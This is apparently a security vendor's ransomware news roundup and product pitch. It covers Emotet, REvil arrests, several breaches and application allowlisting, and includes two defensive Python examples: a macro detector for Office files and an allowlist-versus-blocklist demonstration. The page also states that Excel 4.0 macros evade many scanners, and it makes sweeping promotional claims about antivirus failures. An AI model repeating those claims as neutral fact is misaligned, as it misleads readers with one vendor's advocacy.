Emotet Resurgence Launches Ransomware Attacks

The Emotet botnet, run by the malware-as-a-service group tracked as Mealybug, began a resurgence last month after the January 2021 law-enforcement takedown. Emotet is one of the most prevalent trojans and spreads through spam and phishing emails carrying weaponized Microsoft Office documents. It has traditionally dropped TrickBot or QakBot, which in turn lead to ransomware. In its latest evolution, Emotet installs Cobalt Strike directly on infected systems, giving the criminals immediate hands-on access to the ransomware target's network and shortening the time from infection to encryption.

Cobalt Strike is a commercial adversary-simulation tool normally used by security professionals to emulate attacks, and Emotet is abusing it to gain immediate unauthorized access. The newest Emotet variants also evade typical antivirus by hiding malicious code in Microsoft Office documents: obfuscated VBA macros and, increasingly, Excel 4.0 (XLM) macro sheets that many scanners do not inspect. Ransomware protection built on application allowlisting is one of the best ways to prevent malicious scripts and hidden infected macros from running on a device. PC Matic Pro Security Software has a Microsoft Office macro whitelist that blocks unapproved macros from running on your device.
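Macro allowlisting presupposes being able to tell which documents carry macro code at all, and Emotet's Excel 4.0 macros live in a different place than VBA. The added example below (not code from the page or from PC Matic) opens an Office Open XML file as the zip container it is, reports the parts that hold VBA projects or XLM macro sheets, and applies a simple hash-based allow policy: documents without macro code pass, documents with macro code run only if their SHA-256 is approved. The sample documents are built in memory with placeholder content and are constructed for the test; legacy binary .doc/.xls files are OLE2 rather than zip and need a different parser, which the function signals by returning None.

```python
import hashlib
import io
import zipfile

# Parts that carry executable macro code inside an OOXML (zip) document.
VBA_PART = "vbaProject.bin"      # VBA project for .docm/.xlsm/.pptm (in word/, xl/ or ppt/)
XLM_DIR = "xl/macrosheets/"      # Excel 4.0 macro sheets, the format Emotet favours


def macro_indicators(data: bytes):
    """List (member, reason) for every macro-bearing part of an OOXML file.

    Returns None when the bytes are not a zip container at all, for example a
    legacy OLE2 .doc/.xls, which needs a different parser (olevba handles those).
    """
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return None
    found = []
    for name in names:
        if name.endswith(VBA_PART):
            found.append((name, "VBA project"))
        elif name.startswith(XLM_DIR) and name.endswith(".xml"):
            found.append((name, "Excel 4.0 (XLM) macro sheet"))
    return found


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def allowed_by_policy(data: bytes, sha256_allowlist) -> bool:
    """Macro allowlisting: a document with macro code runs only if its hash is approved."""
    indicators = macro_indicators(data)
    if indicators is None:
        return False            # unknown container: fail closed
    if not indicators:
        return True             # no macro code, nothing to allowlist
    return sha256_hex(data) in sha256_allowlist


def build_sample(members) -> bytes:
    """Build an in-memory zip with the given member names (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in members:
            zf.writestr(name, b"<placeholder/>")
    return buf.getvalue()


# Constructed documents: a clean .docx, a .docm with a VBA project, and an
# .xlsm carrying an Excel 4.0 macro sheet (no VBA at all).
CLEAN_DOCX = build_sample(["[Content_Types].xml", "word/document.xml"])
VBA_DOCM = build_sample(["[Content_Types].xml", "word/document.xml", "word/vbaProject.bin"])
XLM_XLSM = build_sample(["[Content_Types].xml", "xl/workbook.xml", "xl/macrosheets/sheet1.xml"])

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_DOCX), ("vba", VBA_DOCM), ("xlm", XLM_XLSM)):
        print(label, macro_indicators(blob), "allowed:", allowed_by_policy(blob, set()))
```

The XLM check is the one most home-grown scanners miss: a workbook with no vbaProject.bin at all can still execute code from xl/macrosheets/, and a policy that only looks for VBA will wave it through.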


Panasonic Data Breach Creates Uncertainty

The breach of Panasonic's file server is creating uncertainty about what server data was compromised by cyber-criminals. Some reports indicate that hackers gained unauthorized access to Panasonic's system back in June giving the attackers four months or more to further penetrate the company's IT systems. The servers store sensitive technology and employee data which can mean massive amounts of critical data may have been exposed. This is not the first ransomware incident to affect Panasonic and demonstrates the importance of installing effective enterprise cyber-security and ransomware prevention solutions.

FBI's Email System Hacked

A breach of the FBI's email system results in phony FBI cybersecurity alerts being sent to thousands of unsuspecting recipients. The Federal Bureau of Investigation confirms that on Saturday still unidentified hackers breached one of its email servers blasting out fake alert messages.

GoDaddy Security Breach Exposes Over 1 Million Accounts

A GoDaddy network breach exposes 1.2 million managed WordPress customer accounts hosted at GoDaddy. The data hack exposed sensitive customer data to the cybercriminals for a period of almost 3 months. The hackers gained unauthorized access using a compromised password. GoDaddy recently detected suspicious activity on their network and started investigating the security breach with the assistance of an IT forensics company. This cyber incident highlights the importance of password hygiene and email security to guard against phishing attacks using stolen customer data.

US Government Offers $10 Million Reward for Info Leading to DarkSide Ransomware Gang

The US Department of State is offering a $10 million reward for information leading to the identification or location of leaders of the DarkSide ransomware gang. DarkSide was responsible for the May 2021 ransomware attack on Colonial Pipeline that shut down the fuel pipeline the energy company operates. Colonial Pipeline paid a ransom of about $4.4 million in Bitcoin, of which roughly $2.3 million was later recovered by the Justice Department's Ransomware and Digital Extortion Task Force. The federal government is becoming more adept at disrupting the ransomware supply chain and at following cryptocurrency payments back to the criminals who receive them.

As part of the fight against ransomware gangs and malicious cyber threats, NIST recommends the use of Application Allowlisting software as part of every organization's security stack. PC Matic is currently working with NIST's NCCoE to help design and implement the best strategies for zero-trust architectures (ZTA).

The US Government Arrests Hacker Involved in Kaseya Ransomware Attack

In a global law-enforcement action known as Operation GoldDust, the US, with the assistance of Europol's Joint Cybercrime Action Taskforce (J-CAT) and Polish and Romanian authorities, arrested affiliate members of the REvil (also known as Sodinokibi) ransomware-as-a-service group. Two Romanians, a Ukrainian national and several others have been charged with deploying ransomware that affected more than 1,500 downstream clients of MSPs using software from Kaseya, the Florida-based company breached in July 2021. In total the operation has led to the arrest of seven members of the REvil and GandCrab groups, who between them are believed responsible for well over 7,000 ransomware attacks on consumers, businesses, industry and governments worldwide. GandCrab, an earlier ransomware-as-a-service operation, is considered the predecessor of REvil; it ran encryption and extortion attacks that primarily targeted consumers and businesses running Windows PCs.


Hacker Arrest Update: Officials arrest a third ransomware affiliate in Romania. In a separate cyber-police action officials arrest 51 data brokers in Ukraine who were attempting to sell the data of over 300 million individuals.

The US Government Seizes $6 Million from the REvil Gang

Alongside the GoldDust arrests, the US Department of Justice announced the seizure of about $6.1 million in funds traceable to ransom payments received by a Russian REvil affiliate, and filed charges against him. The seizure follows the recovery of roughly $2.3 million of the Colonial Pipeline ransom earlier in the year and shows the federal government becoming more adept at following cryptocurrency payments back to the criminals and disrupting the ransomware supply chain.



Ransomware Breaches Robinhood Trading App Platform

Robinhood Security Data Breach. Over seven million Robinhood trading app customers are at risk after a ransomware attack on the online investment platform. The hacker is extorting the fin-tech company after socially engineering a ransomware breach to gain access to email addresses and other sensitive customer personal data. Data leaked by the cybercriminal includes name, date of birth, email address, and zip code. Robinhood clients have been advised that, to help prevent phishing attacks, future Robinhood emails will not contain links to access their accounts. Clients are also asked to change their passwords and to set up multifactor authentication as a preventative measure.

FBI Warning Against Ryuk Ransomware Attack for Healthcare Providers

Ryuk and TrickBot Ransom Attack Warning. The FBI and CISA (Cybersecurity and Infrastructure Security Agency) have issued a ransomware warning for hospitals and other healthcare providers about TrickBot malware infections leading to attacks using the Ryuk ransomware. TrickBot and BazarLoader are malware variants that are instrumental in the advanced persistent threats (APTs) cybercriminals use to prepare targeted ransomware and extortion attacks. Hospital application allowlisting software can help prevent ransomware by protecting healthcare IT systems and networks from malware breaches.

Cloud Security: Kubernetes Attack Matrix

Microsoft has introduced a Kubernetes Attack Matrix for improving threat protection in cloud container infrastructure. Cloud-native containerized environments are increasingly at risk of ransomware attack. Microsoft is offering its own MITRE ATT&CK-style framework for Kubernetes cloud and cluster security to help IT staff and administrators better identify weaknesses in their defense of containerized applications and cloud-native environments. The framework maps the Kubernetes threat landscape and supports Microsoft's cloud security products in providing continuous discovery, analysis, and protection recommendations against the different security threats that target Kubernetes and Docker environments.

Microsoft Defender for Cloud and Microsoft Defender for Kubernetes are enhanced cloud security products that protect Azure Kubernetes containerized applications as well as on-premises and multi-cloud Arc-enabled Kubernetes. These offerings provide real-time threat protection for Kubernetes nodes and clusters. Host-level threat protection is provided by Microsoft Defender for Servers. Application Allowlisting solutions work seamlessly with Microsoft cloud security to effectively protect against ransomware in cloud, on-premises, and hybrid environments.


Ransomware Attack on the NRA

The ransomware group Grief, an affiliate of REvil, has allegedly stolen sensitive data from the NRA and made it available on the dark web.

New Threat Actor SnapMC Steals Files in "Quick Strikes"

Rapid-strike data exfiltration and cyber-extortion is the modus operandi of the new group SnapMC. The group uses a vulnerability scanner to expose flaws in the target's VPN or web server applications. By exploiting unpatched VPNs and web server applications, SnapMC rapidly breaches the network, steals valuable files, and sends extortion emails, all within 30 minutes. Cybersecurity experts agree that keeping applications and operating system software updated is a crucial step in avoiding these kinds of ransomware cyber-attacks. Learn more about server security and automated security patch update management.


WordPress Plugin Vulnerability Exploits

WP plugin vulnerabilities in the OptinMonster email marketing tool for WordPress created a security hole that left millions of websites exposed to exploitation by hackers through the REST API endpoint used for integration. A patched version of the plugin has since been released.


IT Supply Chain Ransomware Attacks

Microsoft warns that Nobelium, the hacking group behind the SolarWinds breach, is planning a new wave of attacks to compromise customers of cloud service providers (CSPs), managed service providers (MSPs), and other IT service providers.


Conti Ransomware Attacks

An alert has been issued by the FBI and CISA (Cybersecurity and Infrastructure Security Agency) regarding Conti ransomware. "In typical Conti ransomware attacks, malicious cyber actors steal files, encrypt servers and workstations, and demand a ransom payment." Conti threat actors gain access to a network through spearphishing, smishing, and vishing campaigns. They use malicious email attachments and links, fake phone calls, software promotions, stolen Remote Desktop Protocol (RDP) credentials, and other system vulnerabilities.


FamousSparrow APT Hacker Group

FamousSparrow, classified as an advanced persistent threat (APT) group, is a new hacking gang that targets government agencies, engineering companies, legal firms, and other organizations.

BlackMatter Agricultural Ransomware Attack

The BlackMatter ransomware gang's attack on an Iowa grain and feed cooperative could lead to food shortages. The ransomware group is demanding $5.9 million from the agricultural cooperative, a sum that rises to $11.8 million if not paid within 5 days.

Phishing-as-a-Service Group

Microsoft has discovered what can be classified as a Phishing-as-a-Service (PHaaS) group, dubbed BulletProofLink (also known as BulletProftLink and Anthrax). The group offers phishing email services, including hosting and email management, to cyber-gangs.

Application Allowlisting by PC Matic Available in Australia

As ransomware attacks surge globally, Australians are choosing PC Matic's application allowlisting to proactively stop ransomware. PC Matic announced technical and sales support for its business product line, PC Matic Pro and PC Matic MSP, during Australian business hours. "Our mission is to protect the world from ransomware, and Australians understand that application allowlisting is a critical element in any security stack to proactively stop ransomware," said Rob Cheng, CEO and Founder of PC Matic. Explore the difference between application allowlisting and application control.


CISA Releases Remote Access Guidance to Federal Agencies

CISA has released Trusted Internet Connections 3.0 Remote User Use Case guidance for government agencies. The Remote User Use Case provides federal agency users with guidance on how to apply network and multi-boundary security for agencies that allow remote users on their networks. Recent guidance also includes cybersecurity awareness with regard to ransomware attacks, network defense practices, and best practices to prevent cyber-threats. Federal Agency Ransomware Protection.

The President Signs K-12 Cybersecurity Act Into Law

Last week, the President signed the bipartisan K-12 Cybersecurity Act of 2021 into law to provide school districts with IT security resources to combat threats and protect themselves against cyberattacks including ransomware.


Ransomware in the Media

Media Attention

"Each year increased money and attention are devoted to cybersecurity, but ransomware continues to accelerate in the wrong direction. Despite national media coverage, ransomware attacks very rarely ever result in coverage that reveals the failed solutions that led to the infections. Why is that?"

Learn More
Ransomware Prevention and Cybersecurity

Prevention

"Lost in the entire conversation is cyber prevention. Why is that? By focusing strictly on reaction, rather than prevention, the cybersecurity industry maximizes revenue at the expense of their customers. Prevention is practical, economical, and normally not newsworthy. With reaction, however, there is money to be made for the cybersecurity experts who clean up after a ransomware attack, so for many in the industry an incentive exists to allow them to continue."

Read Why Hackers are Winning

Ransomware Warnings

"As the developer of the first global whitelist, Rob Cheng is an American pioneer in cybersecurity. Our federal, state, and local governments would be in much better shape today, from a cyber defense perspective, if we had listened to him early on."

Van Hipp
Chairman of American Defense International, Inc.
Former Deputy Assistant Secretary of the United States Army

"Ransomware is now daily news and its victims are large technically sophisticated organizations, and critical elements of the cybersecurity industry. What is happening?"

Scott Augenbaum
30 year Cyber FBI Veteran, Author of "The Secret to Cybersecurity"
Cybercrime Keynote Speaker on the "Lack of Prevention in Cybersecurity"
Retired FBI Supervisory Special Agent, Cyber Division

Ransomware is Out of Control

Ransomware is getting past some of the most well-known antivirus software products and doing its dirty work for hackers and cybercriminals, including some nation states. Which antivirus or security products are failing to stop these cyber-attacks? A lack of transparency in the industry almost ensures that this vital information is not made public. Consequently, security holes and vulnerabilities are left unresolved, resulting in more ransomware attacks. Other unsuspecting ransom victims are then hit, further fueling the security industry's expensive cycle of recovery efforts and the profits of the ransomware industry.

"The ransomware industry has blossomed into a high growth, high margin business extracting millions of dollars daily from its victims under the cloak of anonymity that have left law enforcement helpless. There is little barrier to entry to making ransomware. Rather than focusing on perpetrators, more attention should focus on the security holes through which the ransomware enters."

Finally, there is a ransomware solution - Read How to Stop Ransomware

Cyber-Prevention is the Missing Piece

"For every ransomware infection, there is a failed antivirus that allowed the ransomware on the network. Why is the public not informed which products are failing, and why they fail? Without ransomware prevention tools in place antivirus software alone is not enough to block threats."

Discover the 3 Pillars of Prevention

  1. Cybersecurity Training
  2. Multifactor Authentication
  3. Application Allowlisting
Explore the best ways to implement the 3 pillars of ransomware prevention.

Application Allowlisting Tools vs Blacklisting Antivirus Software

Unlike blacklisting antivirus software products, Application Allowlisting solutions only allow known, good programs to run on your computer, mobile device, server, or network. With whitelisting, any unknown or untested new program can't run, which prevents malicious ransomware from executing. This effectively blocks hackers' attempts to encrypt your files or lock your system.
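To make the default-deny difference concrete, here is an added example that is not PC Matic's code or any product's implementation. It models both policies as decisions on the SHA-256 hash of a program image: a blocklist (signature antivirus) allows anything it does not recognise, while an allowlist runs only hashes it has approved. The byte strings standing in for executables, the file names, and the hash sets are all constructed for the example; a real deployment would hash the on-disk binary and keep the approved set in a managed, signed store.

```python
import hashlib
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    BLOCK = "block"


def sha256_hex(image: bytes) -> str:
    """Hash of the program image; this is the identity both policies key on."""
    return hashlib.sha256(image).hexdigest()


# Constructed sample "executables" (byte strings stand in for PE files).
KNOWN_GOOD = {
    "notepad.exe": b"MZ-constructed-good-editor-v1",
    "backup.exe": b"MZ-constructed-good-backup-v2",
}
KNOWN_BAD = {
    # A ransomware sample the antivirus vendor has already seen and fingerprinted.
    "old_locker.exe": b"MZ-constructed-known-ransomware",
}
# A never-before-seen binary: no signature exists for it, and it was never approved.
UNKNOWN = {
    "invoice_viewer.exe": b"MZ-constructed-new-ransomware-variant",
}
# A trusted program whose image was modified after approval (e.g. trojanized).
TAMPERED = {
    "backup.exe": KNOWN_GOOD["backup.exe"] + b"-injected-payload",
}

ALLOWLIST = {sha256_hex(img) for img in KNOWN_GOOD.values()}
BLOCKLIST = {sha256_hex(img) for img in KNOWN_BAD.values()}


def blocklist_decision(image: bytes) -> Decision:
    """Signature-style antivirus: default allow, block only recognised bad hashes."""
    return Decision.BLOCK if sha256_hex(image) in BLOCKLIST else Decision.ALLOW


def allowlist_decision(image: bytes) -> Decision:
    """Application allowlisting: default deny, run only recognised good hashes."""
    return Decision.ALLOW if sha256_hex(image) in ALLOWLIST else Decision.BLOCK


def compare(images: dict) -> dict:
    """Return {name: (blocklist verdict, allowlist verdict)} for each image."""
    return {
        name: (blocklist_decision(img), allowlist_decision(img))
        for name, img in images.items()
    }


if __name__ == "__main__":
    for label, batch in (("known good", KNOWN_GOOD), ("known bad", KNOWN_BAD),
                         ("unknown", UNKNOWN), ("tampered", TAMPERED)):
        for name, (bl, al) in compare(batch).items():
            print(f"{label:10} {name:20} blocklist={bl.value:5} allowlist={al.value}")
```

Two rows carry the point of the paragraph: the unknown binary sails past the blocklist because no signature exists for it yet, and the tampered copy of an approved program is stopped by the allowlist because its hash no longer matches the approved image. The cost of default-deny is visible in the same table: every legitimate program has to be enrolled before it will run, which is why allowlisting products invest in automating that enrollment.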

PC Matic is the leading producer of automated Application Allowlisting solutions and security software in the USA. Our security solutions protect enterprise and small business, industry, schools, hospitals, local and federal government IT systems and networks.

Read more about Application Allowlisting Cybersecurity

Ransomware Decryption vs Ransomware Prevention

Using Ransomware Decryption Tools vs Ransomware Prevention Tools. Many victims of a ransomware attack are searching for recovery and decryption tools when it would be much less stressful and less expensive to simply use a ransomware prevention tool like application allowlisting. Use of whitelist technology for access and application control is part of the NIST-recommended cybersecurity protocols.

With whitelisting tools, IT administrators can prevent a server or network data breach in the first place and avoid the remediation and recovery process.

Modern whitelisting technology is cloud-based and very easy to maintain. Visit ransomware protection software for the best anti-ransomware on the market, and explore how application allowlisting solutions work to protect you, your data and your business.